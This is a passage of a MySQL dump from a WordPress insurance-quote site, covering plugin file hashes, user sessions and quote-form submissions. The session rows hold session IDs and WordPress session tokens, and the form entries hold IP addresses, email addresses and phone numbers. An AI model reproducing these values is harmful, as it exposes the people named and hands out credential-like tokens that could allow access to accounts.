34fee\";s:42:\"includes/modules/PerspectiveImage/icon.svg\";s:64:\"b0a443ec2cd324414f521493d1399169899122deddcb3bac7e5b0857318e1a71\";s:43:\"includes/modules/PerspectiveImage/style.css\";s:64:\"7ccefd01c14fa9b8da5a166fbd0635d14cc719837a7bfea20722698a511b12d8\";s:40:\"includes/modules/PriceList/PriceList.php\";s:64:\"314b9699cf9fa247e9cfa8ddc30747d2c5f0b9bd8a2131ac12a9cd40e2dc72df\";s:35:\"includes/modules/PriceList/icon.svg\";s:64:\"1db0091224ed6ac0fc46461c08c9429c3fdc552ff189d7a3f0611f5ffc1be37f\";s:36:\"includes/modules/PriceList/style.css\";s:64:\"c23540bf54e66aaa08f83302d139c1690afbfacd8131c0cf0aaea069fc8e099e\";s:50:\"includes/modules/PriceListChild/PriceListChild.php\";s:64:\"ab58b79580b53126a80fe0a612c112a9a0141772b78608ac72a1ed9067c6c5e4\";s:41:\"includes/modules/PriceListChild/style.css\";s:64:\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\";s:34:\"includes/modules/Shapes/Shapes.php\";s:64:\"5caad50ffae884d6f022611ff88701e664d5e9ba758a2910e6a5fb64c57dad7b\";s:32:\"includes/modules/Shapes/icon.svg\";s:64:\"67c57960a74d2637c01647b7e981a0a1454e5043258bcf9c93bbef852c36a16a\";s:33:\"includes/modules/Shapes/style.css\";s:64:\"fcf39f6311235131a07c5859517f1bbaeaf9173bf8176413072475f0ed967b83\";s:44:\"includes/modules/TextDivider/TextDivider.php\";s:64:\"f7c382bc7d4d4550e5c70300178255930f9020a2250604c517b350d4eedc4fc7\";s:37:\"includes/modules/TextDivider/icon.svg\";s:64:\"af677515b886e361c061aff63fd31e149ba1af0e4b59b5a4692e291b4da29016\";s:38:\"includes/modules/TextDivider/style.css\";s:64:\"432ac9ac7ea74b1463ccbc9684f1d6ac93744a09b6a415d8ae57a4ce40cd07db\";s:46:\"includes/modules/TypingEffect/TypingEffect.php\";s:64:\"0c3ded70a546100dc522fc49901900b1985d03e27eacf4b93f2a6ece1b208f54\";s:45:\"includes/modules/TypingEffect/frontend.min.js\";s:64:\"b03581fd2748aa87d393eddb9da17657d789d34ad3a3ca86d6466fbc6a14a94d\";s:38:\"includes/modules/TypingEffect/icon.svg\";s:64:\"613c30577e26d83b6276258791719eb5f0c50cd7e263ed3bd09dc0e775ecc8b0\";s:39:\"includes/modules/TypingEffect/style.css\";s:64:\"8d8e5cffaaa0d6a4d2f4a1a1ac4179ab24ee79cc4439b2a2fcd980ad3d0056dd\";s:40:\"includes/templates/page-template-404.php\";s:64:\"3d62bc82743128411f865d9929e855efc933ff6a450998a176524d23b6c55d5d\";s:42:\"includes/templates/page-template-blank.php\";s:64:\"65c0ccc6054f53e681009284d76cabbe110afbb8bbc934b5551e745be1489013\";s:43:\"includes/templates/page-template-search.php\";s:64:\"645e285e822b2dd17fdf56e4c4b87b54a9a42932cae109ea6b255c7b33141800\";s:18:\"languages/en_US.mo\";s:64:\"d623fe1e0be61805e86ce71a8598b5bacfaa5045912346e933076b51e957257e\";s:18:\"languages/en_US.po\";s:64:\"90fa5c6c6ea732121fb23605b4455f8c6e151dcf346afe2b27be811afb8cad24\";s:52:\"public/class-dsm-supreme-modules-for-divi-public.php\";s:64:\"0580f928cf7b06a51a7bbbcb2fd73caafc7e842b48cd6b749e2cddd29386faed\";s:16:\"public/index.php\";s:64:\"ae6fc10874855daddd44765416e0f28da65a2b89e9e32802dd66e7fa6690d2d9\";s:22:\"public/css/animate.css\";s:64:\"2414767fbf3e93d3269cb3795b6c667da0f58a8f662dfd8aabb0807243d1134f\";s:26:\"public/css/dsm-easy-tb.css\";s:64:\"06f35d6931442e66c1d532847526e1699dbbd3e380ee0123e4ae5562508c68b9\";s:27:\"public/css/dsm-et-admin.css\";s:64:\"50c1ede77c92c30ef8177ff6ee71a78f8c99b4b303571a8fb584a671571f47ac\";s:42:\"public/js/dsm-before-after-image-slider.js\";s:64:\"fb97a312c1b55028d9e4e69917417bc5bb8c2e9ec0434861ebdadbfa7e732d64\";s:27:\"public/js/dsm-easy-tb-vb.js\";s:64:\"5398ca4c5f546ef58a0e440d3d3d393f52752073df817c1be9bd672c9f82bef9\";s:24:\"public/js/dsm-easy-tb.js\";s:64:\"61b0b89dff442999234c1d25c9023431ca3e52da0b3bc3ec25da58de60950cb5\";s:37:\"public/js/dsm-magnific-popup-image.js\";s:64:\"60e8f29084b141d99eaca0dc867f6d0fa5d961fe6cfc99952dceb4419842f480\";s:37:\"public/js/dsm-magnific-popup-video.js\";s:64:\"6ccc4c34dcfb3ce0c83245d3f9da5871737e974d5e774243a827071b61545f43\";s:23:\"public/js/lottie.min.js\";s:64:\"1e5a81148e1bde6cc5344f7b25072023fba126f1c123973306a7d5b44780d478\";s:23:\"public/js/popper.min.js\";s:64:\"456501b0c2514cbd38e88b88fc8961f4f4680e2dc526eaa34cda7b3590cb0846\";s:34:\"public/js/tippy-bundle.iife.min.js\";s:64:\"17dede86ecba1972dcb4b176c601db53ffaf0c86ef1a9469b450a1fbdb949a58\";s:22:\"public/js/typed.min.js\";s:64:\"f265f734f4919b4a497d1d64984163815bc44c4011ae2d3659695943680e8406\";s:26:\"public/js/typed.min.js.map\";s:64:\"4b667bb20c193ae9001274e519c33faf9acefce15ff9a40fff67143a15e0a0b4\";s:63:\"public/partials/dsm-supreme-modules-for-divi-public-display.php\";s:64:\"adfa6a9f964496fc80b891a0ba0acba3d1301443f3a40e5d81f0a81440772d5c\";s:29:\"scripts/builder-bundle.min.js\";s:64:\"6591f27401df0bce8f7eb6935711463ff4e71364b4bc9b7568404186490990ef\";s:30:\"scripts/frontend-bundle.min.js\";s:64:\"e5d427c23fe4938916aa2cce56067294aa470f3490209ef8e3699643c40ae301\";s:24:\"styles/style-dbp.min.css\";s:64:\"857c2fe80323362cd7c94814f511d82decc3a10b19b9696af2e5806840d67a08\";s:20:\"styles/style.min.css\";s:64:\"0576082f68eaf7cc1509db909d5a1b09ccef6ff7baf3860e8a2324faed874bdb\";s:17:\"styles/.gitignore\";s:64:\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\";}s:4:\"time\";i:1679855836;}',0),('cerber_site_meta',0,'a:2:{s:4:\"lang\";s:5:\"en-US\";s:6:\"wp_ver\";s:3:\"6.2\";}',1681929978);
/*!40000 ALTER TABLE `wpfi_cerber_sets` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfi_cerber_uss`
--

DROP TABLE IF EXISTS `wpfi_cerber_uss`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfi_cerber_uss` (
  `user_id` bigint(20) unsigned NOT NULL,
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `country` char(3) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `started` int(10) unsigned NOT NULL,
  `expires` int(10) unsigned NOT NULL,
  `session_id` char(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `wp_session_token` varchar(250) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  KEY `user_id` (`user_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfi_cerber_uss`
--

LOCK TABLES `wpfi_cerber_uss` WRITE;
/*!40000 ALTER TABLE `wpfi_cerber_uss` DISABLE KEYS */;
INSERT INTO `wpfi_cerber_uss` VALUES (1,'67.198.116.43','',1680981542,1681154342,'W6UgcAjRTvCkxdBy8G2QzEpn','f4b7d5e387cf0c87fdde112f25e47ae5e0e22b0da820385c8a103b1572754593'),(3,'67.198.116.43','',1681827969,1682000769,'wu6qeMYAxaDGUzHc01f7LRpv','8465c58fc9b2fb380b4b70922b42aabc9ff11da770e383435927c337a8c3e026');
/*!40000 ALTER TABLE `wpfi_cerber_uss` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfi_commentmeta`
--

DROP TABLE IF EXISTS `wpfi_commentmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfi_commentmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `comment_id` (`comment_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfi_commentmeta`
--

LOCK TABLES `wpfi_commentmeta` WRITE;
/*!40000 ALTER TABLE `wpfi_commentmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpfi_commentmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfi_comments`
--

DROP TABLE IF EXISTS `wpfi_comments`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfi_comments` (
  `comment_ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `comment_post_ID` bigint(20) unsigned NOT NULL DEFAULT 0,
  `comment_author` tinytext NOT NULL,
  `comment_author_email` varchar(100) NOT NULL DEFAULT '',
  `comment_author_url` varchar(200) NOT NULL DEFAULT '',
  `comment_author_IP` varchar(100) NOT NULL DEFAULT '',
  `comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_content` text NOT NULL,
  `comment_karma` int(11) NOT NULL DEFAULT 0,
  `comment_approved` varchar(20) NOT NULL DEFAULT '1',
  `comment_agent` varchar(255) NOT NULL DEFAULT '',
  `comment_type` varchar(20) NOT NULL DEFAULT 'comment',
  `comment_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`comment_ID`),
  KEY `comment_post_ID` (`comment_post_ID`),
  KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
  KEY `comment_date_gmt` (`comment_date_gmt`),
  KEY `comment_parent` (`comment_parent`),
  KEY `comment_author_email` (`comment_author_email`(10))
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfi_comments`
--

LOCK TABLES `wpfi_comments` WRITE;
/*!40000 ALTER TABLE `wpfi_comments` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpfi_comments` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfi_gf_draft_submissions`
--

DROP TABLE IF EXISTS `wpfi_gf_draft_submissions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfi_gf_draft_submissions` (
  `uuid` char(32) NOT NULL,
  `email` varchar(255) DEFAULT NULL,
  `form_id` mediumint(10) unsigned NOT NULL,
  `date_created` datetime NOT NULL,
  `ip` varchar(45) NOT NULL,
  `source_url` longtext NOT NULL,
  `submission` longtext NOT NULL,
  PRIMARY KEY (`uuid`),
  KEY `form_id` (`form_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfi_gf_draft_submissions`
--

LOCK TABLES `wpfi_gf_draft_submissions` WRITE;
/*!40000 ALTER TABLE `wpfi_gf_draft_submissions` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpfi_gf_draft_submissions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfi_gf_entry`
--

DROP TABLE IF EXISTS `wpfi_gf_entry`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfi_gf_entry` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `form_id` mediumint(10) unsigned NOT NULL,
  `post_id` bigint(10) unsigned DEFAULT NULL,
  `date_created` datetime NOT NULL,
  `date_updated` datetime DEFAULT NULL,
  `is_starred` tinyint(10) NOT NULL DEFAULT 0,
  `is_read` tinyint(10) NOT NULL DEFAULT 0,
  `ip` varchar(45) NOT NULL,
  `source_url` varchar(200) NOT NULL DEFAULT '',
  `user_agent` varchar(250) NOT NULL DEFAULT '',
  `currency` varchar(5) DEFAULT NULL,
  `payment_status` varchar(15) DEFAULT NULL,
  `payment_date` datetime DEFAULT NULL,
  `payment_amount` decimal(19,2) DEFAULT NULL,
  `payment_method` varchar(30) DEFAULT NULL,
  `transaction_id` varchar(50) DEFAULT NULL,
  `is_fulfilled` tinyint(10) DEFAULT NULL,
  `created_by` bigint(10) unsigned DEFAULT NULL,
  `transaction_type` tinyint(10) DEFAULT NULL,
  `status` varchar(20) NOT NULL DEFAULT 'active',
  PRIMARY KEY (`id`),
  KEY `form_id` (`form_id`),
  KEY `form_id_status` (`form_id`,`status`)
) ENGINE=MyISAM AUTO_INCREMENT=14 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfi_gf_entry`
--

LOCK TABLES `wpfi_gf_entry` WRITE;
/*!40000 ALTER TABLE `wpfi_gf_entry` DISABLE KEYS */;
INSERT INTO `wpfi_gf_entry` VALUES (1,1,NULL,'2023-03-13 12:07:13','2023-03-13 12:07:13',0,0,'67.198.116.43','http://cmdev-site1.com/?gf_page=preview&id=1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,3,NULL,'trash'),(2,1,NULL,'2023-03-13 12:49:43','2023-03-13 12:49:43',0,0,'67.198.116.43','http://cmdev-site1.com/?gf_page=preview&id=1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,3,NULL,'trash'),(3,1,NULL,'2023-03-13 15:24:39','2023-03-13 15:24:39',0,0,'67.198.116.43','http://cmdev-site1.com/?gf_page=preview&id=1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,3,NULL,'trash'),(4,1,NULL,'2023-03-13 15:26:03','2023-03-13 15:26:03',0,0,'67.198.116.43','http://cmdev-site1.com/?gf_page=preview&id=1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,3,NULL,'trash'),(5,1,NULL,'2023-03-13 15:28:18','2023-03-13 15:28:18',0,0,'67.198.116.43','http://cmdev-site1.com/insurance-quote/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,3,NULL,'trash'),(6,1,NULL,'2023-03-13 15:33:27','2023-03-13 15:33:27',0,0,'67.198.116.43','http://cmdev-site1.com/insurance-quote/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,3,NULL,'trash'),(7,1,NULL,'2023-03-13 15:47:02','2023-03-13 15:47:02',0,0,'67.198.116.43','http://cmdev-site1.com/insurance-quote/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,3,NULL,'trash'),(8,1,NULL,'2023-03-13 16:10:04','2023-03-13 16:10:04',0,0,'67.198.116.43','http://cmdev-site1.com/insurance-quote/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,3,NULL,'trash'),(9,1,NULL,'2023-03-14 12:09:23','2023-03-14 12:09:23',0,0,'67.198.116.43','http://cmdev-site1.com/insurance-quote/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,3,NULL,'trash'),(10,1,NULL,'2023-03-14 12:53:51','2023-03-14 12:53:51',0,0,'67.198.116.43','http://cmdev-site1.com/insurance-quote/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,3,NULL,'trash'),(11,1,NULL,'2023-03-14 12:55:43','2023-03-14 12:55:43',0,0,'67.198.116.43','http://cmdev-site1.com/insurance-quote/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,3,NULL,'trash'),(12,1,NULL,'2023-03-14 13:24:18','2023-03-14 13:24:18',0,0,'116.204.148.154','http://cmdev-site1.com/insurance-quote/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,1,NULL,'trash'),(13,1,NULL,'2023-03-14 14:24:37','2023-03-14 14:24:37',0,1,'67.198.116.43','http://cmdev-site1.com/insurance-quote/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,3,NULL,'active');
/*!40000 ALTER TABLE `wpfi_gf_entry` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfi_gf_entry_meta`
--

DROP TABLE IF EXISTS `wpfi_gf_entry_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfi_gf_entry_meta` (
  `id` bigint(10) unsigned NOT NULL AUTO_INCREMENT,
  `form_id` mediumint(10) unsigned NOT NULL DEFAULT 0,
  `entry_id` bigint(10) unsigned NOT NULL,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  `item_index` varchar(60) DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `meta_key` (`meta_key`(191)),
  KEY `entry_id` (`entry_id`),
  KEY `meta_value` (`meta_value`(191))
) ENGINE=MyISAM AUTO_INCREMENT=157 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfi_gf_entry_meta`
--

LOCK TABLES `wpfi_gf_entry_meta` WRITE;
/*!40000 ALTER TABLE `wpfi_gf_entry_meta` DISABLE KEYS */;
INSERT INTO `wpfi_gf_entry_meta` VALUES (1,1,1,'3','1967-07-07',''),(2,1,1,'4','Female',''),(3,1,1,'5','100000',''),(4,1,1,'6','Yes',''),(5,1,1,'7','0',''),(6,1,1,'8','300000',''),(7,1,1,'9','3000',''),(8,1,1,'10.3','jane',''),(9,1,1,'10.6','doe',''),(10,1,1,'15','1000000',''),(11,1,2,'3','1967-07-07',''),(12,1,2,'4','Female',''),(13,1,2,'5','100000',''),(14,1,2,'6','Yes',''),(15,1,2,'7','0',''),(16,1,2,'8','300000',''),(17,1,2,'9','3000',''),(18,1,2,'10.3','JANE',''),(19,1,2,'10.6','DOE',''),(20,1,2,'15','1000000',''),(21,1,3,'3','1967-07-07',''),(22,1,3,'4','Female',''),(23,1,3,'5','100000',''),(24,1,3,'6','Yes',''),(25,1,3,'7','0',''),(26,1,3,'8','300000',''),(27,1,3,'9','3000',''),(28,1,3,'10.3','jane',''),(29,1,3,'10.6','doe',''),(30,1,3,'11','news@smcorridornews.com',''),(31,1,3,'12','5129381120',''),(32,1,3,'15','1000000',''),(33,1,4,'3','1967-07-07',''),(34,1,4,'4','Female',''),(35,1,4,'5','100000',''),(36,1,4,'6','Yes',''),(37,1,4,'7','0',''),(38,1,4,'8','300000',''),(39,1,4,'9','3000',''),(40,1,4,'10.3','jane',''),(41,1,4,'10.6','doe',''),(42,1,4,'11','news@smcorridornews.com',''),(43,1,4,'12','5129381120',''),(44,1,4,'15','1000000',''),(45,1,5,'3','1967-07-07',''),(46,1,5,'4','Female',''),(47,1,5,'5','100000',''),(48,1,5,'6','Yes',''),(49,1,5,'7','1',''),(50,1,5,'13','12',''),(51,1,5,'14','No',''),(52,1,5,'8','300000',''),(53,1,5,'9','3000',''),(54,1,5,'10.3','jane',''),(55,1,5,'10.6','doe',''),(56,1,5,'11','melissa@smcorridornews.com',''),(57,1,5,'12','5127873501',''),(58,1,5,'15','1000000',''),(59,1,6,'3','1967-07-07',''),(60,1,6,'4','Female',''),(61,1,6,'5','100000',''),(62,1,6,'6','No',''),(63,1,6,'7','0',''),(64,1,6,'8','300000',''),(65,1,6,'9','3000',''),(66,1,6,'10.3','jane',''),(67,1,6,'10.6','doe',''),(68,1,6,'11','melissa@smcorridornews.com',''),(69,1,6,'12','5127873501',''),(70,1,6,'15','1000000',''),(71,1,7,'3','1967-07-07',''),(72,1,7,'4','Female',''),(73,1,7,'5','100000',''),(74,1,7,'6','Yes',''),(75,1,7,'7','0',''),(76,1,7,'8','300000',''),(77,1,7,'9','3000',''),(78,1,7,'10.3','jane',''),(79,1,7,'10.6','doe',''),(80,1,7,'11','melissa@smcorridornews.com',''),(81,1,7,'12','5129381120',''),(82,1,7,'15','1000000',''),(83,1,8,'3','1967-07-07',''),(84,1,8,'4','Female',''),(85,1,8,'5','100000',''),(86,1,8,'6','Yes',''),(87,1,8,'7','0',''),(88,1,8,'8','300000',''),(89,1,8,'9','3000',''),(90,1,8,'10.3','jane',''),(91,1,8,'10.6','doe',''),(92,1,8,'11','jewett@smcorridornews.com',''),(93,1,8,'12','5127873501',''),(94,1,8,'15','1000000',''),(95,1,9,'3','1967-07-07',''),(96,1,9,'4','Female',''),(97,1,9,'5','100000',''),(98,1,9,'6','Yes',''),(99,1,9,'7','0',''),(100,1,9,'8','300000',''),(101,1,9,'9','3000',''),(102,1,9,'10.3','jane',''),(103,1,9,'10.6','doe',''),(104,1,9,'11','melissa@smcorridornews.com',''),(105,1,9,'12','5127873501',''),(106,1,9,'15','1000000',''),(107,1,10,'3','1967-07-07',''),(108,1,10,'4','Female',''),(109,1,10,'5','100000',''),(110,1,10,'6','Yes',''),(111,1,10,'7','0',''),(112,1,10,'8','300000',''),(113,1,10,'9','3000',''),(114,1,10,'10.3','jane',''),(115,1,10,'10.6','doe',''),(116,1,10,'11','news@smcorridornews.com',''),(117,1,10,'12','5129381120',''),(118,1,10,'15','1000000',''),(119,1,11,'3','1967-07-07',''),(120,1,11,'4','Female',''),(121,1,11,'5','100000',''),(122,1,11,'6','Yes',''),(123,1,11,'7','0',''),(124,1,11,'8','300000',''),(125,1,11,'9','3000',''),(126,1,11,'10.3','jane',''),(127,1,11,'10.6','doe',''),(128,1,11,'11','news@smcorridornews.com',''),(129,1,11,'12','5129381120',''),(130,1,11,'15','1000000',''),(131,1,12,'3','1919-12-12',''),(132,1,12,'4','Male',''),(133,1,12,'5','3434',''),(134,1,12,'6','No',''),(135,1,12,'7','3',''),(136,1,12,'13','3',''),(137,1,12,'14','Yes',''),(138,1,12,'8','3434',''),(139,1,12,'9','3434',''),(140,1,12,'10.3','adfsf',''),(141,1,12,'10.6','asdf',''),(142,1,12,'11','sdsGmail@gmial.com',''),(143,1,12,'12','9879879879',''),(144,1,12,'15','34340',''),(145,1,13,'3','1967-07-07',''),(146,1,13,'4','Female',''),(147,1,13,'5','100000',''),(148,1,13,'6','Yes',''),(149,1,13,'7','0',''),(150,1,13,'8','300000',''),(151,1,13,'9','3000',''),(152,1,13,'10.3','jane',''),(153,1,13,'10.6','doe',''),(154,1,13,'11','melissa@smcorridornews.com',''),(155,1,13,'12','5127873501',''),(156,1,13,'15','1000000','');
/*!40000 ALTER TABLE `wpfi_gf_entry_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfi_gf_entry_notes`
--

DROP TABLE IF EXISTS `wpfi_gf_entry_notes`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfi_gf_entry_notes` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `entry_id` int(10) unsigned NOT NULL,
  `user_name` varchar(250) DEFAULT NULL,
  `user_id` bigint(10) DEFAULT NULL,
  `date_created` datetime NOT NULL,
  `value` longtext DEFAULT NULL,
  `note_type` varchar(50) DEFAULT NULL,
  `sub_type` varchar(50) DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `entry_id` (`entry_id`),
  KEY `entry_user_key` (`entry_id`,`user_id`)
) ENGINE=MyISAM AUTO_INCREMENT=14 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfi_gf_entry_notes`
--

LOCK TABLES `wpfi_gf_entry_notes` WRITE;
/*!40000 ALTER TABLE `wpfi_gf_entry_notes` DISABLE KEYS */;
INSERT INTO `wpfi_gf_entry_notes` VALUES (1,1,'Admin Notification (ID: 64074ce3dce45)',0,'2023-03-13 12:07:15','WordPress was unable to send the notification email. Could not instantiate mail function.','notification','error'),(2,2,'Admin Notification (ID: 64074ce3dce45)',0,'2023-03-13 12:49:45','WordPress was unable to send the notification email. Could not instantiate mail function.','notification','error'),(3,3,'Admin Notification (ID: 64074ce3dce45)',0,'2023-03-13 15:24:42','WordPress was unable to send the notification email. Could not instantiate mail function.','notification','error'),(4,4,'Admin Notification (ID: 64074ce3dce45)',0,'2023-03-13 15:26:05','WordPress was unable to send the notification email. Could not instantiate mail function.','notification','error'),(5,5,'Admin Notification (ID: 64074ce3dce45)',0,'2023-03-13 15:28:25','WordPress was unable to send the notification email. Could not instantiate mail function.','notification','error'),(6,6,'Admin Notification (ID: 64074ce3dce45)',0,'2023-03-13 15:33:31','WordPress was unable to send the notification email. Could not instantiate mail function.','notification','error'),(7,7,'Admin Notification (ID: 64074ce3dce45)',0,'2023-03-13 15:47:07','WordPress was unable to send the notification email. Could not instantiate mail function.','notification','error'),(8,8,'Admin Notification (ID: 64074ce3dce45)',0,'2023-03-13 16:10:06','WordPress was unable to send the notification email. Could not instantiate mail function.','notification','error'),(9,9,'Admin Notification (ID: 64074ce3dce45)',0,'2023-03-14 12:09:25','WordPress was unable to send the notification email. Could not instantiate mail function.','notification','error'),(10,10,'Admin Notification (ID: 64074ce3dce45)',0,'2023-03-14 12:53:52','WordPress was unable to send the notification email. Could not instantiate mail function.','notification','error'),(11,11,'Admin Notification (ID: 64074ce3dce45)',0,'2023-03-14 12:55:44','WordPress was unable to send the notification email. Could not instantiate mail function.','notification','error'),(12,12,'Admin Notification (ID: 64074ce3dce45)',0,'2023-03-14 13:24:19','WordPress was unable to send the notification email. Could not instantiate mail function.','notification','error'),(13,13,'Admin Notification (ID: 64074ce3dce45)',0,'2023-03-14 14:24:39','WordPress was unable to send the notification email. Could not instantiate mail function.','notification','error');
/*!40000 ALTER TABLE `wpfi_gf_entry_notes` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfi_gf_form`
--

DROP TABLE IF EXISTS `wpfi_gf_form`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfi_gf_form` (
  `id` mediumint(10) unsigned NOT NULL AUTO_INCREMENT,
  `title` varchar(150) NOT NULL,
  `date_created` datetime NOT NULL,
  `date_updated` datetime DEFAULT NULL,
  `is_active` tinyint(10) NOT NULL DEFAULT 1,
  `is_trash` tinyint(10) NOT NULL DEFAULT 0,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=6 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfi_gf_form`
--

LOCK TABLES `wpfi_gf_form` WRITE;
/*!40000 ALTER TABLE `wpfi_gf_form` DISABLE KEYS */;
INSERT INTO `wpfi_gf_form` VALUES (1,'Quote Form','2023-03-07 14:40:35',NULL,1,0),(2,'Let\'s Talk','2023-04-02 19:48:07',NULL,1,0),(3,'Quote Form (1)','2023-04-02 20:02:56',NULL,1,1),(4,'TEST','2023-04-08 19:44:42',NULL,1,1),(5,'Request an Agent','2023-04-08 20:02:38',NULL,1,0);
/*!40000 ALTER TABLE `wpfi_gf_form` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfi_gf_form_meta`
--

DROP TABLE IF EXISTS `wpfi_gf_form_meta`;
